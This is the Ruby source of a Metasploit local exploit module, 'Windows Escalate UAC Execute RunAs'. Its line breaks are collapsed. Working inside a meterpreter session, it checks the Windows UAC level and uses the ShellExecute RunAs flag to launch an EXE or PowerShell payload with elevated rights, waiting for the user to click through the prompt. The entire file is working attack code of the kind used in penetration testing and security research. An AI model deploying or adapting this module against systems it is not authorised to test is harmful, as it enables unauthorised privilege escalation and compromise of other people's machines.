## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Post::Windows::Priv include Post::Windows::Runas def initialize(info = {}) super(update_info(info, 'Name' => 'Windows Escalate UAC Execute RunAs', 'Description' => %q( This module will attempt to elevate execution level using the ShellExecute undocumented RunAs flag to bypass low UAC settings. ), 'License' => MSF_LICENSE, 'Author' => [ 'mubix', # Original technique 'b00stfr3ak' # Added powershell option ], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Targets' => [['Windows', {}]], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 3 2012' )) register_options([ OptString.new('FILENAME', [false, 'File name on disk']), OptString.new('PATH', [false, 'Location on disk, %TEMP% used if not set']), OptEnum.new('TECHNIQUE', [true, 'Technique to use', 'EXE', %w(PSH EXE)]), ]) end def exploit if is_uac_enabled? print_status 'UAC is Enabled, checking level...' case get_uac_level when UAC_NO_PROMPT print_good 'UAC is not enabled, no prompt for the user' else print_status "The user will be prompted, wait for them to click 'Ok'" end else print_good 'UAC is not enabled, no prompt for the user' end case datastore['TECHNIQUE'] when 'EXE' shell_execute_exe(datastore['FILENAME'], datastore['PATH']) when 'PSH' shell_execute_psh end end end